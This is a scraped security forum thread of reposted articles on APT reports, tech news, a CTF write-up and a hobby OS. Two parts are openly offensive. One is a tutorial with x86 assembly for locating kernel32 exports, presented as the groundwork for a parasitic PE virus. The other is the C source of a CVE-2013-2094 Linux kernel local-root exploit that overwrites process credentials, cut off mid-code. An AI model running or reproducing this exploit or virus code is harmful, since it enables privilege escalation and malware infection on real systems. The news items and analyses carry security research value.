    [h=1]Kaspersky Lab a descoperit „Opera?iunea NetTraveler”, o campanie de spionaj cibernetic la nivel global care a avut ca ?inte organiza?ii guvernamentale ?i institute de cercetare[/h] Toolkit-ul malware NetTraveler a infectat 350 de victime importante, având ca scop supravegherea ?i furtul de date. Bucure?ti, 5 iunie 2013 - Echipa de exper?i a Kaspersky Lab a publicat un nou raport de cercetare cu privire la NetTraveler, o familie de programe malware utilizate in opera?iuni de tip Advanced Persistent Threat (APT) pentru a compromite cu succes peste 350 de victime foarte importante din 40 de ??ri diferite. Gruparea NetTraveler a infectat victime din numeroase organiza?ii, atât din sectorul public, cât ?i din cel privat, inclusiv institu?ii guvernamentale, ambasade, organiza?ii din industria de petrol ?i gaze, centre de cercetare, centre militare ?i organiza?ii de activi?ti. Potrivit raportului Kaspersky Lab, aceast? amenin?are este activ? înc? din 2004, îns? cel mai mare volum de activitate s-a înregistrat în perioada 2010 - 2013. Cele mai importante domenii de interes pentru gruparea de spionaj cibernetic NetTraveler au inclus recent explorarea spa?ial?, nanotehnologia, produc?ia de energie, energia nuclear?, tehnologia laser, medicina ?i comunica?iile. Metode de infectare: Atacatorii infectau sistemele victimelor trimi?ând e-mailuri de tip spear-phishing, care con?ineau ata?amente Microsoft Office echipate cu dou? vulnerabilit??i intens exploatate (CVE-2012-0158 ?i CVE-2010-3333). Chiar dac? Microsoft a lansat deja patch-uri pentru aceste vulnerabilit??i, ele sunt în continuare exploatate pe scar? larg? în atacuri targetate, dovedindu-se a fi eficiente. Titlurile ata?amentelor mali?ioase din e-mailurile de tip spear-phishing relev? eforturile grup?rii NetTraveler de a-?i adapta atacurile pentru a putea infecta ?intele foarte importante. Printre titlurile documentelor mali?ioase se num?r?: Army Cyber Security Policy 2013.doc Report - Asia Defense Spending Boom.doc Activity Details.doc His Holiness the Dalai Lama’s visit to Switzerland day 4 Freedom of Speech.doc Furtul ?i extragerea de informa?ii: În cadrul analizei Kaspersky Lab, echipa de exper?i a ob?inut jurnalele de infectare de pe diferite servere de comand? ?i de control (C&C) ale grup?rii NetTraveler. Serverele C&C erau utilizate pentru a instala un malware adi?ional pe dispozitivele infectate ?i pentru a extrage informa?iile furate. Exper?ii Kaspersky Lab au estimat cantitatea de informa?ii furate stocate pe serverele de comand? ?i de control ale NetTraveler ca fiind de peste 22 gigabytes. Datele sustrase de pe sistemele infectate au inclus list?ri ale fi?ierelor, loguri de taste ap?sate, dar ?i alte tipuri de fi?iere, cum ar fi PDF-uri, tabele Excel sau documente Word. În plus, toolkit-ul NetTraveler putea s? instaleze un malware suplimentar de tip backdoor creat pentru sustragerea datelor, care putea fi personalizat pentru a fura alte tipuri de informa?ii delicate, cum ar fi detalii de configurare pentru aplica?ii sau fi?iere de proiectare asistat? de calculator (CAD). Statistici ale infect?rii globale: Potrivit analizei Kaspersky Lab asupra serverelor de comand? ?i control ale grup?rii NetTraveler, au existat, în total, 350 de victime în 40 de ??ri diferite, inclusiv Statele Unite, Canada, Marea Britanie, Rusia, Chile, Maroc, Grecia, Belgia, Austria, Ucraina, Lituania, Belarus, Australia, Hong Kong, Japonia, China, Mongolia, Iran, Turcia, India, Pakistan, Coreea de Sud, Thailanda, Qatar, Kazakhstan ?i Iordania. Pe lâng? analiza datelor cu privire la centrele ce control ?i comand?, exper?ii Kaspersky Lab au folosit Kaspersky Security Network (KSN) pentru a identifica statistici suplimentare cu privire la infec?ie. Primele 10 ??ri dup? num?rul de victime detectate de KSN au fost Mongolia, urmat? de Rusia, India, Kazakhstan, Kyrgyzstan, China, Tajikistan, Coreea de Sud, Spania ?i Germania. Descoperiri suplimentare În timpul analizei Kaspersky Lab asupra NetTraveler, exper?ii companiei au identificat ?ase victime care au fost infectate atât de NetTraveler, cât ?i de Red October, o alt? opera?iune de spionaj cibernetic analizat? de Kaspersky Lab în luna ianuarie 2013. De?i nu a fost identificat? nicio leg?tur? direct? între atacatorii NetTraveler ?i actorii implica?i în opera?iunea Red October, faptul c? anumite victime au fost afectate de ambele campanii de spionaj cibernetic demonstreaz? c? aceste victime foarte importante sunt ?inta mai multor atacatori din cauz? c? informa?iile pe care le de?in sunt foarte valoroase. Raportul complet al analizei Kaspersky Lab, inclusiv indicatorii compromiterii, tehnicile de remediere ?i detaliile cu privire la opera?iunea NetTraveler cu toate componentele sale mali?ioase, este disponibil pe Securelist. Produsele Kaspersky Lab detecteaz? ?i neutralizeaz? programele mali?ioase ?i toate versiunile folosite de Toolkit–ul NetTraveler, inclusiv Trojan-Spy.Win32.TravNet ?i Downloader.Win32.NetTraveler. Produsele Kaspersky Lab detecteaz? exploit-urile Microsoft Office folosite în atacurile de tip spear-phishing, inclusiv Exploit.MSWord.CVE-2010-333, Exploit.Win32.CVE-2012-0158. # # # Despre Kaspersky Lab Kaspersky Lab este cel mai mare produc?tor privat de solu?ii de securitate endpoint din lume, fiind inclus în topul primilor patru produc?tori de solu?ii pentru protec?ie endpoint la nivel mondial*. Pe parcursul celor 15 ani de existen??, Kaspersky Lab a r?mas o companie inovatoare în domeniul securit??ii informatice ?i ofer? suite de protec?ie IT pentru utilizatori individuali, SMB ?i companii mari. Compania este prezent? în aproximativ 200 de ??ri ?i protejeaz? peste 300 de milioane de utilizatori din întreaga lume. Pentru mai multe informa?ii, vizita?i www.kaspersky.ro. Sursa: Kaspersky Lab a descoperit „Opera?iunea NetTraveler”, o campanie de spionaj cibernetic la nivel global care a avut ca ?inte organiza?ii guvernamentale ?i institute de cercetare | kaspersky.ro
  13. Nytro
    "Cosul de gunoi" si "Cele mai penale posturi" nu sunt de ajuns, ne mai trebuie o categorie: "Cele mai de cacat posturi".
  14. Nytro
    [h=1]8 months in Microsoft, I learned these [/h]07. June 2013 by Ahmet Alp Balkan Two years ago today, I started Microsoft Windows Azure as an intern, in the very same team I joined right after college and I am working for last 8 months. I decided to summarize a few points I learned so far in this job during last 8 months. This may sound like the way things work are crappy, it is not. I learned that one will see this sort of problems in all large scale companies. Most of them are not specific to Microsoft at all. Every company has its own problems. I am not saying that I am unhappy and not complaining. These are purely a few lessons I was not aware of in the college (expectations vs reality sort of article). Read on: Expect no documentation in corporations. I have seen the knowledge inside the company is mostly transferred by talking and hands-on sessions. Some parts of knowledge base generated are only emailed and not saved anywhere permanent. This is not how the information flows in the digital world. There are certain people, if they got hit by a bus, nobody can pick up their work or code. And it is okay. If this would have been my own company there would be tons of wiki pages. It is not what you do, it is what you sell. You can spend days making your codebase a better place, writing more robust code and fix others’ mistakes. As long as it does not have a big business impact and you can’t ship it, it means practically nothing. Nobody will appreciate you for fixing styling or architectural issues in their core, in fact they may get offended. That’s not something I realized when I was a student. Not everybody is passionate for engineering. You don’t always work with people passionate for creating wonderful software. Mostly, people have other things to do (e.g. family and kids) and writing better code is not a priority for the most. And it is okay. I learned not to expect enthusiasm from everybody. 2-3 hours of coding a day is great. Before taking the job, I was able to code 8-10 hours a day on my personal projects. Somehow in this environment it is almost impossible to get 2 hours straight of coding for me. I spend most of my time trying to figure out how others’ uncommented/undocumented code work, debugging strange things and attending daily meetings. Apparently it’s not just me and there can be days no single commits are pushed to the source control in a team. And it is okay. Not giving back to the public domain is a norm. I haven’t met almost any bloggers or open source developers in my organization dedicating some of their time to give back to the community. Everybody loves finding Stack Overflow answers on search results, but nobody contributes those answers. I can understand that. The world outside is not known here a lot. I bet you’re reading what sort of latest technologies and tools are out on blogs, Reddit or Hacker News every day. It’s not common here. I am surprised that no one I met in Windows Azure team heard about Heroku or Rackspace, which are direct competitors. That’s acceptable, not everybody has to know these. It is all about getting shit done in corporations. If your manager asks a button there doing that, nobody cares what sort of mess you created. As long as that functionality is ready, it is okay and can always be fixed later. (I haven’t seen that ever happened, yet.) In college, I learned code quality is as important as the result, turned out wrong. Copy-pasting code can be okay. If somebody sees you doing this outside the corporations, you’ll probably get punched in the face. I’ve seen source files copy pasted across projects. As long as it gets shit done (described above) no one cares if you produced unmaintainable code. Code reviews can be skipped, for the sake of agility. It’s part of the culture in my team, if you are messing with somebody else’s code, you’ll send code reviews. Otherwise it is usually not done and you may wait a lot of time and after a lot of pings to draw some attention, maybe somebody will respond. Latest software, meh. Not everybody is fond of latest versions here. Almost 90% of my colleagues use older versions of Office, Windows, Visual Studio and .NET Framework. There is a common belief that newer versions will break existing workflows. This might be the same reason why some enterprises still run all their software on Java 1.3-1.5. So, I learned not to expect latest software on environments. Your specialties usually do not matter. Thousands get hired every year out of college and usually randomly assigned to a team (which you can’t change for 1.5 years). It does not matter whether you have mastered MongoDB, created iOS apps, been an Apache committer, created your own networking library, designed user interfaces or bootstrapped your own startup. You are hired to do get something needed done. I was not expecting that. It’s hard to find a position in corporations matches what you love to do. At the end, you are working for your manager’s and their managers’ paychecks. I was not aware of this fact in college. (This post made it to the top of Hacker News and /r/programming. Thanks everyone for comments and support. There are over 1,000 comments on HN, Reddit and below, I did not have a chance to read them all, sorry if I missed yours.) Sursa: 8 months in Microsoft, I learned these | /home/alp
  15. Nytro
    Nu se poate, orice am incerca, baietii sunt foarte inventivi si ar gasi rapid "bypass"-uri. In plus, nu prea se injura, ca se folosesc cuvinte "vulgare", pula mea, e ok, dar nu permitem atacurile la persoana.
  16. Nytro
    @semaca16: Care esti ma? Ce grupa? Vezi ca restantele s-au scumpit la 50 RON.
  17. Nytro
    Incursiune printre serverele Facebook care vor stoca pozele, comentariile ?i like-urile europenilor Facebook a dat drumul celui mai nou centru de date pe care-l de?ine, locul prin care vor trece Like-urile, Share-urile ?i informa?iile noastre private. Centrul din Suedia este unul dintre cele mai impresionante din lume. Centrul de date din Lulea, Suedia a fost pornit ast?zi, iar reprezentan?ii Facebook au spus c? are posibilitatea de a fi unul dintre cele mai eficiente ?i mai sustenabile centre de date din lume. Compania a men?ionat c? toate echipamentele sunt alimentate de energie hidroelectric?, iar generatoarele de rezerv? sunt mult mai pu?ine, datorit? capacit??ilor de refolosire a energiei. Facebook a ales nordul Suediei pentru acest centru de date ca s? r?ceasc? serverele unde stocheaz? pozele, video-urile, comentariile ?i like-urile noastre. C?ldura suplimentar? generat? de centrul de date este folosit? pentru a înc?lzi birourile angaja?ilor. Pozi?ionarea serverelor în Suedia ar putea aduce utilizatorilor din Europa performan?e mai bune ?i mai rapide. Centrul a fost anun?at în octombrie 2011 de c?tre vicepre?edintele de opera?iuni Facebook, Tom Furlong. Centrul de date din Lulea este primul din afara Statelor Unite ale Americii. Pân? s? aleag? Suedia, Facebook a avut de ales între diferite zone reci ale Europei. Astfel, Lulea este la 100 de kilometri de Cercul polar Arctic ?i este în apropierea unui râu. Fiecare cl?dire are 14 generatoare de rezerv?, care func?ioneaz? pe motorin?. Poze si video: GALERIE FOTO Incursiune printre serverele Facebook care vor stoca pozele, comentariile ?i like-urile europenilor | adevarul.ro
  18. Nytro
    [h=3]Vanilla1 : write-what-where exploitation (ASLR, Full RELRO, Stack cookie)[/h]Hello, For today article, we're going to analyze and exploit a write-what-where with ASLR, no PIE, full RELRO and stack cookie. This is part of a set of challenges made by sm0k: Vanilla Dome Wargame . Let's begin. [h=2]The challenge[/h] Before any reversing attempt, we need to launch the program to see what it does. vanilla1@VanillaDome ~ $ ls -lash total 76K 4.0K drwxr-xr-x 2 root root 4.0K Apr 29 14:15 . 4.0K drwxr-x--x 10 root root 4.0K May 15 20:52 .. 4.0K -rw-r--r-- 1 root root 127 Mar 23 05:56 .bash_logout 4.0K -rw-r--r-- 1 root root 193 Mar 23 05:56 .bash_profile 4.0K -rw-r--r-- 1 root root 3.9K Apr 29 15:47 .bashrc 44K -rw-r--r-- 1 root root 44K Apr 29 14:15 .gdbinit 8.0K -r-sr-sr-x 1 vanilla1crack vanilla1crack 6.7K Apr 29 12:28 Vanilla1 4.0K -r-------- 1 vanilla1crack vanilla1crack 19 Apr 29 12:28 key vanilla1@VanillaDome ~ $ ./Vanilla1 Usage:./Vanilla1 <file> vanilla1@VanillaDome ~ $ ./Vanilla1 key vanilla1@VanillaDome ~ $ python -c 'print "a" * 1024' > /tmp/file.txt vanilla1@VanillaDome ~ $ ./Vanilla1 /tmp/file.txt Ok, it basically read some file and do stuffs with it ... [h=2]Let's reverse it[/h] Opening GDB and disassembling main we get the following: Dump of assembler code for function main: 0x08048578 <+0>: push ebp 0x08048579 <+1>: mov ebp,esp 0x0804857b <+3>: and esp,0xfffffff0 ; alignment 0x0804857e <+6>: sub esp,0x1050 ; there is a HUGE buffer and we have ebp = esp + 0x1050 0x08048584 <+12>: mov eax,DWORD PTR [ebp+0x8] ; argc 0x08048587 <+15>: mov DWORD PTR [esp+0x1c],eax ; n_arg = argc 0x0804858b <+19>: mov eax,DWORD PTR [ebp+0xc] ; argv 0x0804858e <+22>: mov DWORD PTR [esp+0x18],eax ; args = argv 0x08048592 <+26>: mov eax,gs:0x14 ; eax = stack cookie 0x08048598 <+32>: mov DWORD PTR [esp+0x104c],eax ; stack cookie (stored in gs:0x14) 0x0804859f <+39>: xor eax,eax 0x080485a1 <+41>: cmp DWORD PTR [esp+0x1c],0x1 ; if (n_arg <= 1) then error 0x080485a6 <+46>: jg 0x80485c4 <main+76> ; else continue 0x080485a8 <+48>: mov eax,DWORD PTR [esp+0x18] ; args ptr 0x080485ac <+52>: mov edx,DWORD PTR [eax] ; program name 0x080485ae <+54>: mov eax,0x8048790 ; format = "\t Usage:%s <file>\n" ; printf ("\t Usage:%s <file>\n", argv[0]); 0x080485b3 <+59>: mov DWORD PTR [esp+0x4],edx 0x080485b7 <+63>: mov DWORD PTR [esp],eax 0x080485ba <+66>: call 0x8048434 <printf@plt> 0x080485bf <+71>: jmp 0x80486a9 <main+305> ; bye ; memset (esp+0x38, 0x0, 0x1000); 0x080485c4 <+76>: mov DWORD PTR [esp+0x34],0x0 ; fp = NULL; 0x080485cc <+84>: mov DWORD PTR [esp+0x8],0x1000 0x080485d4 <+92>: mov DWORD PTR [esp+0x4],0x0 0x080485dc <+100>: lea eax,[esp+0x38] 0x080485e0 <+104>: mov DWORD PTR [esp],eax 0x080485e3 <+107>: call 0x80483f4 <memset@plt> ; fp = fopen (argv[1], "r"); 0x080485e8 <+112>: mov edx,0x80487a3 ; "r" 0x080485ed <+117>: mov eax,DWORD PTR [esp+0x18] ; args 0x080485f1 <+121>: add eax,0x4 0x080485f4 <+124>: mov eax,DWORD PTR [eax] ; eax = args[1]; 0x080485f6 <+126>: mov DWORD PTR [esp+0x4],edx 0x080485fa <+130>: mov DWORD PTR [esp],eax 0x080485fd <+133>: call 0x8048424 <fopen@plt> 0x08048602 <+138>: mov DWORD PTR [esp+0x34],eax 0x08048606 <+142>: cmp DWORD PTR [esp+0x34],0x0 ; if (fp == NULL) then error 0x0804860b <+147>: je 0x80486a9 <main+305> 0x08048611 <+153>: jmp 0x8048682 <main+266> ; else fgets ; value1 = atoll (buffer); 0x08048613 <+155>: lea eax,[esp+0x1038] ; this is a small buffer (ebp-0x1050+0x1038 = ebp-0x18) 0x0804861a <+162>: mov DWORD PTR [esp],eax 0x0804861d <+165>: call 0x8048414 <atoll@plt> 0x08048622 <+170>: mov DWORD PTR [esp+0x30],eax ; fgets (sbuffer, 0x14, fp); 0x08048626 <+174>: mov eax,DWORD PTR [esp+0x34] ; eax = fp 0x0804862a <+178>: mov DWORD PTR [esp+0x8],eax 0x0804862e <+182>: mov DWORD PTR [esp+0x4],0x14 0x08048636 <+190>: lea eax,[esp+0x1038] ; sbuffer 0x0804863d <+197>: mov DWORD PTR [esp],eax 0x08048640 <+200>: call 0x80483e4 <fgets@plt> ; value2 = atoll(sbuffer); 0x08048645 <+205>: lea eax,[esp+0x1038] 0x0804864c <+212>: mov DWORD PTR [esp],eax 0x0804864f <+215>: call 0x8048414 <atoll@plt> 0x08048654 <+220>: mov DWORD PTR [esp+0x2c],eax 0x08048658 <+224>: cmp DWORD PTR [esp+0x30],0x0 ; if (value1 == 0) then fgets 0x0804865d <+229>: je 0x8048682 <main+266> 0x0804865f <+231>: cmp DWORD PTR [esp+0x2c],0x0 ; if (value2 == 0) then fgets 0x08048664 <+236>: je 0x8048682 <main+266> ; insert (value2, value1, esp+0x38); 0x08048666 <+238>: lea eax,[esp+0x38] 0x0804866a <+242>: mov DWORD PTR [esp+0x8],eax 0x0804866e <+246>: mov eax,DWORD PTR [esp+0x30] ; eax = value1 0x08048672 <+250>: mov DWORD PTR [esp+0x4],eax 0x08048676 <+254>: mov eax,DWORD PTR [esp+0x2c] ; eax = value2 0x0804867a <+258>: mov DWORD PTR [esp],eax 0x0804867d <+261>: call 0x8048534 <insert> ; fgets (buffer, 0x14, fp); 0x08048682 <+266>: mov eax,DWORD PTR [esp+0x34] ; eax = fp 0x08048686 <+270>: mov DWORD PTR [esp+0x8],eax 0x0804868a <+274>: mov DWORD PTR [esp+0x4],0x14 0x08048692 <+282>: lea eax,[esp+0x1038] ; buffer 0x08048699 <+289>: mov DWORD PTR [esp],eax 0x0804869c <+292>: call 0x80483e4 <fgets@plt> 0x080486a1 <+297>: test eax,eax ; if (still data) then loop 0x080486a3 <+299>: jne 0x8048613 <main+155> ; check cookie 0x080486a9 <+305>: mov eax,0x0 0x080486ae <+310>: mov edx,DWORD PTR [esp+0x104c] ; stack cookie 0x080486b5 <+317>: xor edx,DWORD PTR gs:0x14 0x080486bc <+324>: je 0x80486c3 <main+331> 0x080486be <+326>: call 0x8048444 <__stack_chk_fail@plt> 0x080486c3 <+331>: leave 0x080486c4 <+332>: ret End of assembler dump. Articol complet: http://binholic.blogspot.ro/2013/06/vanilla1-write-what-where-exploitation.html
  19. Nytro
    [h=1]Six months with Windows 8 (white paper)[/h]By Aryeh Goretsky posted 6 Jun 2013 at 09:00AM When Windows 8 first came out, ESET was the first to publish a white paper looking at its security features. In the intervening half-year, we have continued our research, observing how well Windows 8 is doing from a security perspective, as well how it is being adopted by our customers. As a result of continuing research, we have released a new paper, detailing our observations in the first six months. Here are some of the key findings from the first six months with Windows 8: About 3.3% of ESET’s 100M+ customers have adopted Windows 8 (which is a slightly higher adoption rate than most organizations tracking Windows 8 – such as NetApps – have reported, but lower than that of at least one reporter, Valve, which collects data from gamers’ PCs) The replacement of the Start Menu with the Start Screen has generated a whole new ecosystem of Start Menu substitutes. ESET does not treat these programs as malware or PUAs simply because of this functionality, which offer a more traditional interface that many people seem to appreciate. It is important to keep in mind such programs could contain malware, be bundled with potentially unwanted software, or engage in other behavior that causes them to be classified as a threat, unsafe, unwanted or even a suspicious application. No malware was identified in the Windows Store, which now has about 60,000 apps. There have been problems with fake apps in the Windows Store, though, as well as ebook piracy. The current nature of the Windows Store may be hampering Windows 8?s acceptance in BYOD scenarios because of manageability or legal concerns by corporate customers. Windows 8?s Secure UEFI Boot process appears to be intact, with no signs that malware has bypassed it so far. Windows RT comes with a somewhat-hidden copy of Windows Defender app bundled in it. Like its counterpart in Windows 8, Windows Defender provides a base level of security for the operating system. Unlike its counterpart in Windows 8, the Windows RT version it cannot be replaced by another solution. For more information, you can download the white paper directly at Six Months with Windows 8 [PDF, 787KB] or to see all of ESET’s white papers, click on the Papers tab, above. Aryeh Goretsky, MVP, ZCSE Distinguished Researcher Sursa: Six months with Windows 8 (white paper) - We Live Security
  20. Nytro
    [h=2]CONFidence 2013 and the x86 quirks[/h]Another week, another conference. Just a few days ago, Gynvael and I had the pleasure to attend and present at the CONFidence 2013 infosec conference traditionally held in Cracow, Poland. The event requires no further introduction – it has been simply the best Polish conference in the security area since it first started, and this year’s edition was up to the usual high standard – we had some great time, meeting old and making new friends as well as enjoying some of the better talks. With regards to our presentation, we originally intended it to be a gathering of references concerning all of the interesting quirks, undocumented behavior and other amusing facts (directly or indirectly related to the CPU architecture) that we heard or learnt about in both 32 and 64-bit x86 processors during the recent years. If you are closely following the CPU hacking and operating system security scene, you are probably aware of most of the material we presented – still, we hope it proves useful as a thorough reference and possibly motivates you to take a deeper look at some of the areas we discussed during the talk. In addition to what was covered on stage, you can also find several extra “further reading” slides containing references to information which did not fit into the elementary slide deck. Download: Beyond MOV ADD XOR – the unusual and unexpected in x86 (PDF, 5.6MB) Sursa: CONFidence 2013 and the x86 quirks | j00ru//vx tech blog
  21. Nytro
    [h=1]BIND 9 patched against remote crash vuln[/h][h=2]Protection against DoS[/h] By Richard Chirgwin, 11th June 2013 Time to get patching, sys admins: ISC (the Internet Systems Consortium) has issued a fix for a BIND 9 denial of service vulnerability. The defect and patch, published last week, “allows an attacker to crash a BIND 9 recursive resolver with a RUNTIME_CHECK error in resolver.c”, the ISC says in its announcement. CVE-2013-3919 says BIND 9.6-ESV-R9, 9.8.5 and 9.9.3 are affected by the bug. While older versions aren't affected, ISC notes that they're also unsupported and could be carrying other unpatched vulnerabilities. “At the time of this advisory no intentional exploitation of this bug has been observed in the wild. However, the existence of the issue has been disclosed on an open mailing list with enough accompanying detail to reverse engineer an attack and ISC is therefore treating this as a Type II (publicly disclosed) vulnerability, in accordance with our Phased Disclosure Process”, the ISC announcement says. Upgraded versions can be downloaded here. ® Sursa: BIND 9 patched against remote crash vuln • The Register
  22. Nytro
    [h=1][Quick tutorial] Finding Kernel32 Base and walking its export table[/h]by SIGSEGV Hey all , I'll just begin as the title says it all. Only Basic PE-format and assembly knowledge are required. The baby steps of any parasitic PE virus should be Finding the Kernel32 Base in the current process address space , then walking its export table to extract the addresses of all the functions it needs. To find the Kernel base , We'll exploit the fact that the Process Environment Block structure of the current process holds a list of the modules , loaded in the process's address space , in their memory loading order , InMemoryOrderModuleList. In Windows NT , The value at offset 0x30 of the FS segment points to the PEB structure : typedef struct _PEB { BOOLEAN InheritedAddressSpace; BOOLEAN ReadImageFileExecOptions; BOOLEAN BeingDebugged; BOOLEAN Spare; HANDLE Mutant; PVOID ImageBaseAddress; PPEB_LDR_DATA LoaderData; // The rest of the structure is irrelevant to us } PEB, *PPEB; So , we follow the LoaderData pointer , which takes us to another structure , PEB_LDR_DATA : typedef struct _PEB_LDR_DATA { ULONG Length; BOOLEAN Initialized; PVOID SsHandle; LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; } PEB_LDR_DATA, *PPEB_LDR_DATA; InMemoryOrderModule is a double linked list and it's what we are interested in , each entry in the list points to an LDR_MODULE structure : typedef struct _LDR_MODULE { LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; PVOID BaseAddress; //..... } LDR_MODULE, *PLDR_MODULE; This structure holds the base address of it's module ,, Now , from Windows 2000 and up to windows 7 , The third module loaded in memory will always be that kernel32.dll. Putting all into code : mov ebx, [FS : 0x30] ; PEB mov ebx, [ebx + 0x0C] ; PEB->Ldr mov ebx, [ebx + 0x14] ; PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry) mov ebx, [ebx] ; 2nd Entry mov ebx, [ebx] ; 3rd Entry mov ebx, [ebx + 0x10] ; Third entry's base address (Kernel32.dll) mov [ebp+dwKernelBase] , ebx The following example does the following : Find Kernel32.dll base address Parse it's export tables to locate GetProcAddress Use it to locate LoadLibraryA Use it to Load User32.dll into the current address space Use GetProcAddress to locate MessageBoxA in User32.dll Display a Message box Return to Host. I'm in the middle of my final exams , so I'm afraid I can't explain the example thoroughly , but anyone with basic PE and assembly knowledge should easily grasp it. ; By SIGSEGV [BITS 32] pushad call CodeStart CodeStart: pop ebp sub ebp,CodeStart ; delta offset shit mov ebx, [FS : 0x30] ; get a pointer to the PEB mov ebx, [ebx + 0x0C] ; get PEB->Ldr mov ebx, [ebx + 0x14] ; get PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry) mov ebx, [ebx] ; 2nd Entry mov ebx, [ebx] ; 3rd Entry mov ebx, [ebx + 0x10] ; Get Kernel32 Base mov [ebp+dwKernelBase] , ebx add ebx, [ebx+0x3C] ; Start of PE header mov ebx, [ebx+0x78] ; RVA of export dir add ebx, [ebp+dwKernelBase] ; VA of export dir mov [ebp+dwExportDirectory] , ebx lea edx,[ebp+api_GetProcAddress] mov ecx,[ebp+len_GetProcAddress] call GetFunctionAddress mov [ebp+AGetProcAddressA] , eax lea edx,[ebp+api_LoadLibrary] push edx push dword [ebp+dwKernelBase] call eax mov [ebp+ALoadLibraryA] , eax lea edx , [ebp+szUser32] push edx call eax lea edx , [ebp+api_MessageBoxA] push edx push eax mov ebx,[ebp+AGetProcAddressA] call ebx mov [ebp+AMessageBoxAA] , eax push 0 lea edx,[ebp+szTitle] push edx lea edx,[ebp+szMsg] push edx push 0 call eax popad push 0xBBBBBBBB ;OEP retn ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; <<<<< GetFunctionAddress >>>>>> ; ; Extracts Function Address From Export Directory and returns it in eax ; ; Parameters : Function name in edx , Length in ecx ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; GetFunctionAddress: push ebx push esi push edi mov esi, [ebp+dwExportDirectory] mov esi, [esi+0x20] ;RVA of ENT add esi, [ebp+dwKernelBase] ;VA of ENT xor ebx,ebx cld looper: inc ebx lodsd add eax , [ebp+dwKernelBase] ;eax now points to the string of a function push esi ;preserve it for the outer loop mov esi,eax mov edi,edx cld push ecx repe cmpsb pop ecx pop esi jne looper dec ebx mov eax,[ebp+dwExportDirectory] mov eax,[eax+0x24] ;RVA of EOT add eax,[ebp+dwKernelBase] ;VA of EOT movzx eax , word [ebx*2+eax] ;eax now holds the ordinal of our function mov ebx,[ebp+dwExportDirectory] mov ebx,[ebx+0x1C] ;RVA of EAT add ebx,[ebp+dwKernelBase] ;VA of EAT mov ebx,[eax*4+ebx] add ebx,[ebp+dwKernelBase] mov eax,ebx pop edi pop esi pop ebx ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; Data Shit ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; szTitle: db "Yo !",0 szMsg: db "GreeTz From SIGSEGV",0 szUser32 db "User32.dll",0 AGetProcAddressA: dd 0 api_GetProcAddress: db "GetProcAddress" len_GetProcAddress: dd $-api_GetProcAddress ALoadLibraryA: dd 0 api_LoadLibrary: db "LoadLibraryA",0 AMessageBoxAA: dd 0 api_MessageBoxA: db "MessageBoxA",0 dwKernelBase: dd 0 dwExportDirectory: dd 0 That's it , but I shall post the complete virus source when i get through my exams. Hope you enjoyed this quick tutorial , any feedback is appreciated. Greets , SIGSEGV. Sursa: [Quick tutorial] Finding Kernel32 Base and walking its export table. - rohitab.com - Forums
  23. Nytro
    [h=1]SidonX86 - A simple hobby OS[/h][h=3]by captmicro[/h] I'm new the the forums (though I browse alot) so I figured I'd post some content! This is my hobby OS I've been working on for the past year or so on and off when I have free time, it's still nothing near complete. It doesn't have paging at the moment but I'm reading up about it and attempting to get it working on another OS before I implement it for this. It has memory allocation (blocks only), a text-mode screen library, a minimal c standard library (written by myself, and I have to say it's not the best), a serial port library, and a simple interrupt manager. So far the only applications are a simple terminal, a half-working subleq OISC, and a hex editor (the only really decent app so far) that was ported from my xbox1 hex editor. I'm in the process of writing a transistor design and simulation tool for it, which is something I've really wanted to do for a long time, so expect that soon. One thing that really needs to be done is a disk interface or some sort of in-memory file system so I can load applications without having to compile them into the OS. I've had a go at it once but never tested it (due to not having a file system to load a binary from), so it might just work (see kernel/binldr/elf.c for the code). I have implemented loading apps over a serial port in another OS, but it's probably the WORST idea I ever had. As for the startup screen, don't mind it. This OS was intended to be my entry into low-level TCP/IP stack programming but I haven't gotten that far yet. Once I get a file system working I will probably start on the ethernet card driver and TCP/IP stack. Feel free to do whatever you want with this OS, just please credit me (except the bootloader, I barely wrote any of it). NOTE: you need mingw or some form of gcc, ld, and objcopy to use the build_kernel.bat script. NASM is included in the download splash screen: and the only decent app, the hex editor (it actually has quite a lot of features for a terminal hex editor!): [h=4]Attached Files[/h] likedev.zip 291.33K Sursa: SidonX86 - A simple hobby OS - rohitab.com - Forums
  24. Nytro
    [h=1]Linux kernel perf_swevent_init - Local root Exploit[/h] /* * CVE-2013-2094 exploit x86_64 Linux < 3.8.9 * by sorbo (sorbo@darkircop.org) June 2013 * * Based on sd's exploit. Supports more targets. * */ #define _GNU_SOURCE #include <string.h> #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <stdint.h> #include <sys/syscall.h> #include <sys/mman.h> #include <linux/perf_event.h> #include <signal.h> #include <assert.h> #define BASE 0x380000000 #define BASE_JUMP 0x1780000000 #define SIZE 0x10000000 #define KSIZE 0x2000000 #define TMP(x) (0xdeadbeef + (x)) struct idt { uint16_t limit; uint64_t addr; } __attribute__((packed)); static int _fd; static int perf_open(uint64_t off) { struct perf_event_attr attr; int rc; // printf("perf open %lx [%d]\n", off, (int) off); memset(&attr, 0, sizeof(attr)); attr.type = PERF_TYPE_SOFTWARE; attr.size = sizeof(attr); attr.config = off; attr.mmap = 1; attr.comm = 1; attr.exclude_kernel = 1; rc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0); return rc; } void __sc_start(void); void __sc_next(void); void __sc(void) { asm("__sc_start:\n" "call __sc_next\n" "iretq\n" "__sc_next:\n"); } void sc(void) { int i, j; uint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-8192)); uint64_t kbase = ((uint64_t)current) >> 36; int uid = TMP(1); int gid = TMP(2); for (i = 0; i < 4000; i += 4) { uint64_t *p = (void *) &current[i]; uint32_t *cred = (uint32_t*) p[0]; if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue; for (j = 0; j < 20; j++) { if (cred[j] == uid && cred[j + 1] == gid) { for (i = 0; i < 8; i++) { cred[j + i] = 0; return; } } } } } static void 